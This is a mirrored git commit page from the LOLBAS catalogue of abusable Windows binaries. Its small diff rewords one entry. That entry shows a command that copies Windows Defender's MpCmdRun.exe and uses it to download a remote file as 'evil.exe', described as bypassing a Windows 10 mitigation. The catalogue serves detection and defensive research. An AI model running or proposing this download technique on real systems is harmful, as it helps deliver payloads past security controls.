public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-10-14 09:25:07 +02:00
Code Issues Projects Releases Wiki Activity

Improve GitHub Actions workflows (#467)

Browse Source
This commit is contained in:
Wietze
2025-10-02 18:14:34 +01:00
committed by GitHub
parent 2d7441bb9a
commit dcca4db04a
16 changed files with 150 additions and 188 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
yml/OSBinaries/MpCmdRun.yml
View File

@@ -12,7 +12,7 @@ Commands:
MitreID: T1105
OperatingSystem: Windows 10
- Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url {REMOTEURL:.exe} -path C:\Users\Public\Downloads\evil.exe
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]
Description: Download file to specified path. Slashes work as well as dashes (/DownloadFile, /url, /path). Updated version to bypass Windows 10 mitigation.
Usecase: Download file
Category: Download
Privileges: User